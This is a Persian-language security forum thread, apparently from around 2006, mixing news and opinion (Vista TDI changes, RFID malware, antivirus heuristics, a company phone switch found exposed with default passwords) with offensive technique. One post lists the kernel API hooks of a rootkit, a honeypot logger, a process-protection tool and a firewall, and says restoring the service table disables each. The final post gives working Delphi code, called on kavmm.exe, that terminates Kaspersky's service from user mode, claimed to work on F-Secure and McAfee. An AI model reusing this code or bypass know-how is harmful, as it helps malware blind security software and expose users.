TIP

[Inprise]

روی ویستا ، معماری TDI نه تنها تغییر کرده ، که یک جاهائی قراره کاملا" متفاوت عمل کنه ، و حالا واقعا" ایده ای ندارم که فایروالهای سطح کرنل ، قراره برای ویستا بازنویسی بشن ؟! یا قراره ویستا در انتشار نهائی با مدل قبلی TDI باز هم سازگار باشه ؟ مورد دوم به تقریب خوبی منتفیه ، و سوال جدید این خواهد بود که چرا کمپانیهای توسعه گر فایروال و محصولاتی از این دست که بصورت مستقیم با TDI کار میکنند تابحال سر و صدائی نکردند ؟

[Inprise]

شاید همیشه برای تجربه کردن یه اتفاق جالب لازم نباشه از یه تکنیک یا روش یا ابزار عمیق استفاده کرد . پسوردهای پیش فرض . دیگه این روزها حتی کودکان دبستانی هم مفهوم Default Password و ریسک امنیتی تغییر ندادن پسوردهای پیش فرض بخشهای مختلف سیستمهای نرم افزاری-سخت افزاری یک چیزهائی شنیده اند ، اما امروز صبح وقتی مشغول بررسی کیفیت ترافیک تلفن یک کمپانی بودم ( دفتر مرکزی : آیداهو - اندازه : لااقل سیصد کارمند تمام وقت در پنج ایالت ) تصادفا" متوجه یکی از سافت سوئیچهاشون شدم که بدون پیکره بندی امن و با پسوردهای پیش فرض از پشت فایروال شرکت براحتی در دسترس بود .









PBX Side این سوئیچ به بیست خط ISDN شهری متصل بود که میتونست بسادگی تماسهای تلفنی ( و دیتا ) با کلیه شهرهای داخل ایالت به رایگان ( هزینه به عهدهء شرکت ) و با هزینه ای نازل به سایر ایالات برقرار کنه ، و البته امکان پخش فایلهای صوتی از پیش ضبط شده نیز موجوده . ( برقراری تماسی که منبع آن مشخص نیست ، این روزها یک تهدید امنیتی جدی برای کشوری مانند ایالات متحده به حساب میاد ؛ پروژه های مانیتورینگ/کنترلی مخابراتی رقمهای میلیاردی دریافت میکنند و دولت فعلی ، حتی مجوز شنود بدون حکم قضائی رو به آژانس امنیت ملی - NSA - داده است )

و حالا جالبه که بدون توجه به میلیونها دلار هزینهء امنیتی ، یک حماقت مدیریتی خیلی خیلی کودکانه ، میتونه چقدر ساده و سهل در دسترس قرار بگیره . بدون تردید ، تروریستهای آینده ، بیشتر از سایرین به اینترنت علاقه مند خواهند بود ...

[Inprise]

این بهترین مقاله ایه که این هفته خوندم ، و جالبه که بخش قابل توجهی از کدهاش رو با دلفی نوشته ؛ در واقع این اولین دفعه ای است که یکی از مقالات صفحه اصلی روتکیت دات کام ، برای PoC از دلفی استفاده میکنه . پیش از این فقط HolyFather مولف روتکیت هکردیفندر جرات کرده بود کاری مشابه این انجام بده .

[Inprise]

وقتی بعضی از مشخصه های هدر تمام فایلهائی که توسط Morphin تولید میشن ( Packed and Encrypted ) همواره ثابته ، چرا موتورهای هیوریستیک احمق اغلب آنتی ویروسها بیشتر از دو دقیقه زمان لازم دارن تا برای یک on-demand scan ساده یک فایل Morphined رو شناسائی کنن ؟

[Inprise]

و جالبترین خبر هفته این بود که عده ای در حال تلاش برای توسعه کد مخرب برای تگ ها رادیوئی هستند . این تگ ها که از RFID استفاده میکنند عموما" برای شناسائی کتابها و اجناس گران قیمت مغازه ها و ردیابی حیوانات اهلی خانگی و امثال این کاربرد دارن و حالا این کدهای مخرب با آلوده کردن میکروچیپ این تگ میتونن جوابهای متفاوت و غیر واقعی تولید کنن یا حتی از تگ به عنوان منبع ارسال سیگنال استفاده کنند ...



http://www.scmagazine.com/uk/news/article/547193/?n=uk
http://www.theregister.co.uk/2006/03...ected_by_virus

[Developer Programmer]

هر شب، بعد از خستگی روزانه، میام تا پستهات رو بخونم...اما مدتیه که خبری ازت نیست.

[Best Programmer]

امروز کمی بیکار شدم گفتم چندتا نرم افزار و rootkit را نگاه بندازم:
• Kernel Rootkits
– HE4Hook
• Security Tools
– Sebek Win32
– DiamondCS Process Guard
– Kerio Personal Firewall 4

---------------------------------------------------------------
HE4Hook :
HE4Hook برای مخفی کردن بوسیله hook کردن توابع زیر کار میکنه :
ZwCreateFile 20 --[hooked by unknown at 81222476]--
ZwOpenFile 64 --[hooked by unknown at 812224A8]--
ZwQueryDirectoryFile 7D --[hooked by unknown at 812224D2]--
یا hook کردن جدولهای callback درون فایل درایور سیستم.

به راحتی با بازگرداندن جدول سرویس غیرفعال گردد.
----------------------------------------------------------------
Sebek Win32 :
توابع زیر را hook می کند :
ZwClose 18 SEBEK.sys [F729A092]
ZwCreateFile 20 SEBEK.sys [F729A98C]
ZwCreateKey 23 SEBEK.sys [F729AD10]
ZwEnumerateKey 3C SEBEK.sys [F729AE02]
ZwEnumerateValueKey 3D SEBEK.sys [F729AA50]
ZwOpenFile 64 SEBEK.sys [F729A8E6]
ZwOpenKey 67 SEBEK.sys [F729AD88]
ZwQueryDirectoryFile 7D SEBEK.sys [F729A4CC]
ZwQuerySystemInformation 97 SEBEK.sys [F729A5F0]
ZwReadFile A1 SEBEK.sys [F7299CF0]
ZwRequestWaitReplyPort B0 SEBEK.sys [F7299F14]
ZwSecureConnectPort B8 SEBEK.sys [F7299FE6]
ZwWriteFile ED SEBEK.sys [F7299D48]

این توابع hook میشوند تا
1: sebek.sys را مخفی کنند
2: register key های که در فرایند لود sebek.sys قرار دارند را مخفی کنند.
3: توابع ZwReadFile/ZwWriteFile برای لاگ کردن Cmd.exe

بازگرداندن جدول سرویس کاملا لاگ کردن و مخی سازی sebek را غیر فعال می کند.
----------------------------------------------------------------
DiamondCS Process Guard :
توابع زیر را hook می کند :
ZwCreateFile 20 \??\C:\WINNT\System32\drivers\procguard.sys
[F7392D8A]
ZwCreateKey 23 \??\C:\WINNT\System32\drivers\procguard.sys
[F7391F98]
ZwCreateThread 2E \??\XXXXXX\System32\drivers\procguard.sys
[F73924FC]
ZwOpenFile 64 \??\XXXXXX\System32\drivers\procguard.sys
[F7392C62]
ZwOpenKey 67 \??\XXXXXXT\System32\drivers\procguard.sys
[F7391F64]
ZwOpenProcess 6A \??\XXXXXX\System32\drivers\procguard.sys
[F739289E]
ZwOpenThread 6F \??\XXXXXX\System32\drivers\procguard.sys
[F73926F8]
ZwRequestWaitReplyPort B0 \??\XXXXXX\System32\drivers\procguard.sys
[F7390AE6]
ZwSetValueKey D7 \??\XXXXXX\System32\drivers\procguard.sys
[F739224E]
ZwWriteVirtualMemory F0 \??\XXXXXX\System32\drivers\procguard.sys

بازگرداندن جدول سرویس فرایند جلوگیری terminate را از بین می برد :D
----------------------------------------------------------------
Kerio Personal Firewall 4
توابع زیر را hook می کند
ZwCreateFile 20 \SystemRoot\system32\drivers\fwdrv.sys [BFBD3830]
ZwCreateProcess 29 \SystemRoot\system32\drivers\fwdrv.sys [BFBD3380]
ZwCreateThread 2E \SystemRoot\system32\drivers\fwdrv.sys [BFBD35E0]
ZwResumeThread B5 \SystemRoot\system32\drivers\fwdrv.sys [BFBD3630]
بازگرداندن جدول سرویس این فایروال را غیرفعال می سازد.

البته همین جا از آقای ایپرایز که واقعا باعث پیشرفت من همیشه شده اند تشکر می کنم.

[jalilmousavi]

بالاخره تونستم روی Ring3 سرویس KAspersky رو Terminate کنم ؛ :wise1:

Function DebugKillProcess(ProcessId: dword): boolean;

var

 pHandle: dword;

 myPID: dword;

 HandlesInfo: PSYSTEM_HANDLE_INFORMATION_EX;

 r: dword;

begin

 Result := false;

 myPID := GetCurrentProcessId();

 if not EnableDebugPrivilege() then Exit;

 if DbgUiConnectToDbg() <> STATUS_SUCCESS then Exit;

 pHandle := OpenProcessEx(ProcessId);

 if DbgUiDebugActiveProcess(pHandle) <> STATUS_SUCCESS then Exit;

 HandlesInfo := GetInfoTable(SystemHandleInformation);

 if HandlesInfo = nil then Exit;

 for r := 0 to HandlesInfo^.NumberOfHandles do

  if (HandlesInfo^.Information[r].ProcessId = myPID) and

     (HandlesInfo^.Information[r].ObjectTypeNumber = $8) 

     then begin

       CloseHandle(HandlesInfo^.Information[r].Handle);

       Result := true;

       break;

     end;

 VirtualFree(HandlesInfo, 0, MEM_RELEASE);

end;

DebugKillProcess(GetProcessId('kavmm.exe'));

با اینکه بقیه آنتی ویروسها ارزش صرف چنین وقت ی رو ندارند لیکن روی F-Secure و MCAfee هم جواب داد ؛ احتمالا" بر و بچه های KAV باید یک دوجین API دیگه رو هم به لیست Interceptor شون اضافه کنند ، چون لغو عملکرد ExitProcess و ZwTerminateProcess به تنهائی مشکلی رو حل نمیکنه .

:wise2:

با تشکر لطفا بگوئید که تایپ PSYSTEM_HANDLE_INFORMATION_EX از کجا آمده است.